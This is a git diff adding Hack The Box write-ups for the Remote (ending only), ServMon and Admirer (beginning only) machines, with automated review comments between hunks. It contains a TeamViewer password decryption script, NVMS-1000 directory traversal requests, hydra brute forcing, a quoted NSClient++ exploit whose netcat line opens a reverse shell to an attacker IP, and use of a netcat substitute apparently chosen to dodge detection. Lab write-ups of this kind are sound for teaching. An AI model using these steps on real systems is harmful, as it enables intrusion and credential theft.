68BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
+ LastMACUsed REG_MULTI_SZ \0005056B9A169
+ MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
+ MIDVersion REG_DWORD 0x1
+ ClientID REG_DWORD 0x6972e4aa
+ CUse REG_DWORD 0x1
+ LastUpdateCheck REG_DWORD 0x5e72893c
+ UsageEnvironmentBackup REG_DWORD 0x1
+ **SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B**
+ MultiPwdMgmtIDs REG_MULTI_SZ admin
+ MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
+ Security_PasswordStrength REG_DWORD 0x3
+
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings
+
+
+
+We already see it but let's filter to just get the part we want:
+
+
+
+ # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7 /v SecurityPasswordAES
+
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
+ **SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B**
+
+
+
+now that we got it, we can use the python script of the aforementionned blog post in order to decrypt the password:
+
+
+ import sys, hexdump, binascii
+ from Crypto.Cipher import AES
+
+ class AESCipher:
+ def __init__(self, key):
+ self.key = key
+
+ def decrypt(self, iv, data):
+ self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
+ return self.cipher.decrypt(data)
+
+ key = binascii.unhexlify("0602000000a400005253413100040000")
+ iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
+ **hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"**
+
+ ciphertext = binascii.unhexlify(hex_str_cipher)
+
+ raw_un = AESCipher(key).decrypt(iv, ciphertext)
+
+ print(hexdump.hexdump(raw_un))
+
+ password = raw_un.decode('utf-16')
+ print(password)
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
+ → pip3 install pycryptodome hexdump
+ Requirement already satisfied: pycryptodome in /home/nothing/.local/lib/python3.9/site-packages (3.10.1)
+ Requirement already satisfied: hexdump in /home/nothing/.local/lib/python3.9/site-packages (3.3)
+
+ [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
+ → python3 decrypt.py
+ 00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
+ 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+ None
+ !R3m0te!
+
+
+And we found the password! Now let's use it with evilWinRM:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
+ → evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
+ remote\administrator
+ *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
+ *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
+ 6aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
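Review bot: in the TeamViewer decryption script, `print(hexdump.hexdump(raw_un))` is the source of the stray `None` in the output: `hexdump.hexdump()` prints and returns None, so call it without the outer `print` (or use `hexdump.dump()` and print that), and since the hexdump shows the plaintext zero-padded (`00 00 00 ...`), `raw_un.decode('utf-16')` should be followed by `.rstrip('\x00')` before the value is reused, otherwise the padding travels into any script that consumes `password`. Two further points in the same hunk: the pasted 46153.py is not runnable as rendered (`<****?xml`, `<****msxsl:script`, `**` bold markers inside the payload string, and the trailing `%` after `print("End");`, which is the shell's no-newline marker), so either paste the file verbatim or point readers to the exploit-db original and list only the fields to change; and the sentence "this password is encrypted with **AES-128-CBC**" should say explicitly that the key `0602000000a400005253413100040000` and IV `0100010067244F436E6762F25EA8D704` are hard-coded constants rather than per-install secrets, which is the actual weakness: anyone who can read `HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7` (here the low-privileged `iis apppool\defaultapppool` shell) can recover the unattended-access password, and the WinRM login on 5985 then works because the same password is reused for the local Administrator account.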
diff --git a/Easy/45.md b/Easy/45.md
new file mode 100644
index 0000000..af9dbb1
--- /dev/null
+++ b/Easy/45.md
@@ -0,0 +1,581 @@
+# ServMon Writeup
+
+
+
+## Introduction :
+
+ServMon is an easy Windows box released back in April 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → nmap -sCV 10.10.10.184
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:22 CEST
+ Nmap scan report for 10.10.10.184
+ Host is up (0.053s latency).
+ Not shown: 996 closed ports
+ PORT STATE SERVICE VERSION
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 5666/tcp open tcpwrapped
+ 8443/tcp open ssl/https-alt
+ | fingerprint-strings:
+ | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
+ | HTTP/1.1 404
+ | Content-Length: 18
+ | Document not found
+ | GetRequest:
+ | HTTP/1.1 302
+ | Content-Length: 0
+ | Location: /index.md
+ | workers
+ |_ jobs
+ | http-title: NSClient++
+ |_Requested resource was /index.md
+ | ssl-cert: Subject: commonName=localhost
+ | Not valid before: 2020-01-14T13:24:20
+ |_Not valid after: 2021-01-13T13:24:20
+ |_ssl-date: TLS randomness does not represent time
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=5/29%Time=60B25FA8%P=x86_64-pc-linux-gn
+ SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
+ SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+ SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1
+ SF:8\x7f\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
+ SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.
+ SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R
+ SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen
+ SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length
+ SF::\x2018\r\n\r\nDocument\x20not\x20found");
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
+ |_smb2-time: ERROR: Script execution failed (use -d to debug)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+
+ Nmap done: 1 IP address (1 host up) scanned in 911.51 seconds
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → nmap -sCV -p21 10.10.10.184
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:43 CEST
+ Nmap scan report for 10.10.10.184
+ Host is up (0.12s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_01-18-20 12:05PM Users
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 21 ftp with anonymous login allowed, so let's examine it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → wget -r ftp://anonymous:anonymous@10.10.10.184/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → tree
+ .
+ └── 10.10.10.184
+ └── Users
+ ├── Nadine
+ │ └── Confidential.txt
+ └── Nathan
+ └── Notes to do.txt
+
+
+After downloading recursively everything there was in the ftp service, we get 2 potential usernames and 2 textfiles:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → cat 10.10.10.184/Users/Nadine/Confidential.txt
+ Nathan,
+
+ I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
+
+ Regards
+
+ Nadine%
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → cat 10.10.10.184/Users/Nathan/Notes\ to\ do.txt
+ 1) Change the password for NVMS - Complete
+ 2) Lock down the NSClient Access - Complete
+ 3) Upload the passwords
+ 4) Remove public access to NVMS
+ 5) Place the secret files in SharePoint%
+
+
+Our nmap scan also picked up port 80:
+
+
+
+Seems like we get a NVMS service, let's check if there are any exploits known for it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → searchsploit NVMS
+ ------------------------------------------ ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------ ---------------------------------
+ NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
+ OpenVms 5.3/6.2/7.x - UCX POP Server Arbi | multiple/local/21856.txt
+ OpenVms 8.3 Finger Service - Stack Buffer | multiple/dos/32193.txt
+ TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
+ ------------------------------------------ ---------------------------------
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → cat $(locate 47774.txt)
+ # Title: NVMS-1000 - Directory Traversal
+ # Date: 2019-12-12
+ # Author: Numan Türle
+ # Vendor Homepage: http://en.tvt.net.cn/
+ # Version : N/A
+ # Software Link : http://en.tvt.net.cn/products/188.html
+
+ POC
+ ---------
+
+ GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
+ Host: 12.0.0.1
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+ Accept-Encoding: gzip, deflate
+ Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ Response
+ ---------
+
+ ; for 16-bit app support
+ [fonts]
+ [extensions]
+ [mci extensions]
+ [files]
+ [Mail]
+ MAPI=1%
+
+
+Looks like NVMS1000 is vulnerable to Directory Traversal attacks, so let's test this:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini --path-as-is
+ ; for 16-bit app support
+ [fonts]
+ [extensions]
+ [mci extensions]
+ [files]
+ [Mail]
+ MAPI=1
+
+
+
+Following the note we found earlier, let's use that directory traversal vulnerability to get to Passwords.txt:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is
+ 1nsp3ctTh3Way2Mars!
+ Th3r34r3To0M4nyTrait0r5!
+ B3WithM30r4ga1n5tMe
+ L1k3B1gBut7s@W0rk
+ 0nly7h3y0unGWi11F0l10w
+ IfH3s4b0Utg0t0H1sH0me
+ Gr4etN3w5w17hMySk1Pa5$%
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is > passwords.txt
+
+
+
+Now with this we can use hydra to bruteforce the ssh passwords :
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → hydra -L users.txt -P passwords.txt ssh://10.10.10.184
+ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-29 19:23:59
+ [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
+ [DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
+ [DATA] attacking ssh://10.10.10.184:22/
+ [22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-29 19:24:01
+
+
+
+So let's SSH as the nadine user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → ssh nadine@10.10.10.184
+ The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
+ ECDSA key fingerprint is SHA256:l00hI7FlitUwW9ndgFDHLzImSDNxQcjLOKxQPRmbzls.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.184' (ECDSA) to the list of known hosts.
+ nadine@10.10.10.184's password:
+ Microsoft Windows [Version 10.0.18363.752]
+ (c) 2019 Microsoft Corporation. All rights reserved.
+
+ nadine@SERVMON C:\Users\Nadine>dir
+ Volume in drive C has no label.
+ Volume Serial Number is DC93-6115
+
+ Directory of C:\Users\Nadine
+
+ 08/04/2020 23:16 DIR> .
+ 08/04/2020 23:16 DIR> ..
+ 18/01/2020 11:23 DIR> 3D Objects
+ 18/01/2020 11:23 DIR> Contacts
+ 08/04/2020 22:28 DIR> Desktop
+ 08/04/2020 22:28 DIR> Documents
+ 18/01/2020 11:23 DIR> Downloads
+ 08/04/2020 22:27 DIR> Favorites
+ 08/04/2020 22:27 DIR> Links
+ 18/01/2020 11:23 DIR> Music
+ 18/01/2020 11:31 DIR> OneDrive
+ 18/01/2020 11:23 DIR> Pictures
+ 18/01/2020 11:23 DIR> Saved Games
+ 18/01/2020 11:23 DIR> Searches
+ 18/01/2020 11:23 DIR> Videos
+ 0 File(s) 0 bytes
+ 15 Dir(s) 6,097,006,592 bytes free
+
+ nadine@SERVMON C:\Users\Nadine>type Desktop/user.txt
+ The syntax of the command is incorrect.
+
+ nadine@SERVMON C:\Users\Nadine>cd Desktop
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is DC93-6115
+
+ Directory of C:\Users\Nadine\Desktop
+ ****08/04/2020 22:28 DIR> .
+ 08/04/2020 22:28 DIR> ..
+ 29/05/2021 16:31 34 user.txt
+ 1 File(s) 34 bytes
+ 2 Dir(s) 6,097,006,592 bytes free
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
+ dbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get root access to this box, we're going to use WinPEAS to enumerate this box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → locate winPEAS.bat
+ /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>curl "http://10.10.14.13:9090/winPEAS.bat" --output peas.bat
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 35761 100 35761 0 0 35761 0 0:00:01 --:--:-- 0:00:01 247k
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>cmd /c peas.bat
+
+
+` 
+
+As we look for interesting stuff with the winpeas.bat output, we stumble upon NSClient++:
+
+
+
+So let's look for available exploits:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → searchsploit nsclient++
+ ----------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------- ---------------------------------
+ NSClient++ 0.5.2.35 - Authenticated Remo | json/webapps/48360.txt
+ NSClient++ 0.5.2.35 - Privilege Escalati | windows/local/46802.txt
+ ----------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+Here we want the Privilege Escalation one:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → cat $(46802.txt)
+ 46802.txt: command not found
+ ^[[A^C
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → cat $(locate 46802.txt)
+
+ [...]
+
+ Exploit:
+ 1. Grab web administrator password
+ - open c:\program files\nsclient++\nsclient.ini
+ or
+ - run the following that is instructed when you select forget password
+ C:\Program Files\NSClient++>nscp web -- password --display
+ Current password: SoSecret
+
+ 2. Login and enable following modules including enable at startup and save configuration
+ - CheckExternalScripts
+ - Scheduler
+
+ 3. Download nc.exe and evil.bat to c:\temp from attacking machine
+ @echo off
+ c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe
+
+ 4. Setup listener on attacking machine
+ nc -nlvvp 443
+
+ 5. Add script foobar to call evil.bat and save settings
+ - Settings > External Scripts > Scripts
+ - Add New
+ - foobar
+ command = c:\temp\evil.bat
+
+ 6. Add schedulede to call script every 1 minute and save settings
+ - Settings > Scheduler > Schedules
+ - Add new
+ - foobar
+ interval = 1m
+ command = foobar
+
+ 7. Restart the computer and wait for the reverse shell on attacking machine
+ nc -nlvvp 443
+ listening on [any] 443 ...
+ connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
+ Microsoft Windows [Version 10.0.17134.753]
+ (c) 2018 Microsoft Corporation. All rights reserved.
+
+ C:\Program Files\NSClient++>whoami
+ whoami
+ nt authority\system
+
+
+We could follow the steps, but it is preferable to use the other script (48360.py) to automate this. So we're going to follow the first step:
+
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>powershell
+ Windows PowerShell
+ Copyright (C) Microsoft Corporation. All rights reserved.
+
+ Try the new cross-platform PowerShell https://aka.ms/pscore6
+
+ PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr password
+ password = ew2x6SsGTxjRwXOT
+
+
+
+And then, we're going to visit port 8443, that our nmap scan picked up as being NSClient++, however viewing the page from https://10.10.10.184:8443 will not allow us to login because only localhost is allowed as we can see from the config file:
+
+
+ PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr 127
+ allowed hosts = 127.0.0.1
+
+
+
+So we're going to make a SSH tunnel to the host to access it's localhost:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → **ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184**
+ nadine@10.10.10.184's password: **L1k3B1gBut7s@W0rk**
+
+ Microsoft Windows [Version 10.0.18363.752]
+ (c) 2019 Microsoft Corporation. All rights reserved.
+
+ nadine@SERVMON C:\Users\Nadine>
+
+
+
+Now with the SSH tunnel, we can visit the website from it's localhost by going to **https://127.0.0.1:8443** using the **ew2x6SsGTxjRwXOT** password we found earlier:
+
+
+
+
+
+Once we are logged in, we're going to make sure that we can get a binary file to get a reverse shell from the box. And as i have discovered, HTB does not care about it's older retired boxes, and does not update them / fix them in case a problem like this happens:
+
+
+
+Literally every other writeup of this machine uses netcat (x86 or x64 versions) and yet it is not doable on this box. Therefore we need to get a binary file onto the box that will replicate what netcat does but at the same time bypassing whatever is preventing us from getting a reverse shell (privileged or not) from this box, although we could hypothesize that this box has flagged several of our netcat binaries, we can't know for sure. To do so we're going to use [xc](https://github.com/xct/xc) which is a golang version of netcat written by [xct](https://app.hackthebox.eu/profile/13569):
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+ → sudo apt install golang-go
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+ → git clone https://github.com/xct/xc ; cd xc
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+ → go version
+ go version go1.15.9 linux/amd64
+
+
+
+We first need go version 1.15+ to be able to compile the xc binary, then clone the xc repository, then we follow the setup steps on the README.md:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → go get golang.org/x/sys/...
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → go get golang.org/x/text/encoding/unicode
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → go get github.com/hashicorp/yamux
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → go get github.com/ropnop/go-clr
+ package github.com/ropnop/go-clr: build constraints exclude all Go files in /home/nothing/go/src/github.com/ropnop/go-clr
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → pip3 install donut-shellcode
+ Collecting donut-shellcode
+ Downloading donut-shellcode-0.9.2.tar.gz (149 kB)
+ |████████████████████████████████| 149 kB 2.0 MB/s
+ Building wheels for collected packages: donut-shellcode
+ Building wheel for donut-shellcode (setup.py) ... done
+ Created wheel for donut-shellcode: filename=donut_shellcode-0.9.2-cp39-cp39-linux_x86_64.whl size=56786 sha256=0e6037e945da6f8496c98bdb849a13ca84339af1ef50166a7480d6477d9729b8
+ Stored in directory: /home/nothing/.cache/pip/wheels/ac/72/45/1a77c4737812b5635cd958224c0ff623ebcef62c15ef083bab
+ Successfully built donut-shellcode
+ Installing collected packages: donut-shellcode
+ Successfully installed donut-shellcode-0.9.2
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → sudo apt install rlwrap upx -y
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → make
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → ls -lash | grep xc
+ 1.3M -rwxr-xr-x 1 nothing nothing 1.3M May 30 14:03 xc
+ 3.2M -rwxr-xr-x 1 nothing nothing 3.2M May 30 14:03 xc.exe
+ 4.0K -rw-r--r-- 1 nothing nothing 2.7K May 30 14:03 xc.go
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → file xc xc.exe xc.go
+ xc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), statically linked, no section header
+ xc.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
+ xc.go: C source, ASCII text
+
+
+
+So now we successfully compiled xc for both linux and windows, let's test the linux version:
+
+
+
+Looks like it is working locally, so let's test the windows version of xc on the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → python3 -m http.server 9090
+
+ PS C:\Users\Nadine> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe
+
+ PS C:\Users\Nadine> cd c:\temp
+
+ PS C:\temp> ./xc.exe 10.10.14.13 9001
+ 2021/05/30 13:59:45 Connected to 10.10.14.13:9001
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
+ → ./xc -l -p 9001
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/05/30 14:51:44 Listening on :9001
+ 2021/05/30 14:51:44 Waiting for connections...
+ 2021/05/30 14:52:08 Connection from 10.10.10.184:56967
+ 2021/05/30 14:52:08 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\temp]: !shell
+ Microsoft Windows [Version 10.0.18363.752]
+ (c) 2019 Microsoft Corporation. All rights reserved.
+
+ nadine@SERVMON C:\temp>whoami
+ whoami
+ servmon\nadine
+
+And we managed to get a reverse shell ! Although it's as the nadine user, so let's get one with the privesc exploit:
+
+
+ PS C:\temp> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
+ → ./xc -l -p 9001
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → python3 48360.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "C:\Temp\xc.exe 10.10.14.13 9001"
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
+ → ./xc -l -p 9001
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/05/30 15:02:41 Listening on :9001
+ 2021/05/30 15:02:41 Waiting for connections...
+ 2021/05/30 15:03:08 Connection from 10.10.10.184:57375
+ 2021/05/30 15:03:08 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\Program Files\NSClient++]: !shell
+ Microsoft Windows [Version 10.0.18363.752]
+ (c) 2019 Microsoft Corporation. All rights reserved.
+
+ C:\Program Files\NSClient++>whoami
+ whoami
+ nt authority\system
+
+ C:\Program Files\NSClient++>type C:\Users\Administrator\Desktop\root.txt
+ type C:\Users\Administrator\Desktop\root.txt
+ d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
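Review bot: the statement in the "Once we are logged in" and "Literally every other writeup" paragraphs that netcat "is not doable on this box" is not backed by anything in the hunk: no failed nc.exe transfer, no listener left at "Waiting for connections..." and no Defender or antivirus message is shown, so either include the failing attempt (the command plus the error or the idle listener) or soften the claim to what was actually observed; the paragraph itself concedes "we can't know for sure". Three smaller points in the same hunk. First, the two curl requests differ only in `--path-as-is`, and the empty output of the first is left unexplained; one sentence noting that curl removes the `../` segments from the path before sending unless `--path-as-is` is given would tell the reader why only the second request reaches `windows/win.ini`. Second, `type Desktop/user.txt` fails with "The syntax of the command is incorrect." because cmd.exe reads the forward slash as a switch marker; `type Desktop\user.txt` would have worked without the `cd`, and a line saying so keeps the error from looking like a permissions problem. Third, the hydra run uses `-L users.txt` but that file is never created or shown, and the text runs `python3 48360.py` while the searchsploit output lists `json/webapps/48360.txt`; state that users.txt held the two names taken from the FTP listing and reconcile the exploit filename. Also, the tunnel transcript shows `nadine@10.10.10.184's password: **L1k3B1gBut7s@W0rk**` although ssh never echoes the typed password, so mark it as inserted by the author or drop it, and the section heading says "Getting Root Access" while the shell obtained is `nt authority\system`. Formatting: the screenshots did not survive into the diff (empty gaps after "Our nmap scan also picked up port 80:", after "let's test the linux version:", at the 8443 login and at the winPEAS output), stray `**` and `****` markers sit inside the transcripts at `****08/04/2020 22:28 DIR> .` and `> <****(__`, a lone backtick line follows `cmd /c peas.bat`, and "it's localhost" should read "its localhost" in both places.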
diff --git a/Easy/46.md b/Easy/46.md
new file mode 100644
index 0000000..18ed29d
--- /dev/null
+++ b/Easy/46.md
@@ -0,0 +1,808 @@
+# Admirer Writeup
+
+
+
+## Introduction :
+
+Admirer is an easy/Medium linux box released back in May 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Admirer]
+ → nmap -vvv -p- 10.10.10.187 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.187
+ Discovered open port 80/tcp on 10.10.10.187
+ Discovered open port 21/tcp on 10.10.10.187
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Admirer]
+ → nmap -sCV -p22,80,21 10.10.10.187
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 12:53 CEST
+ Nmap scan report for 10.10.10.187
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
+ | ssh-hostkey:
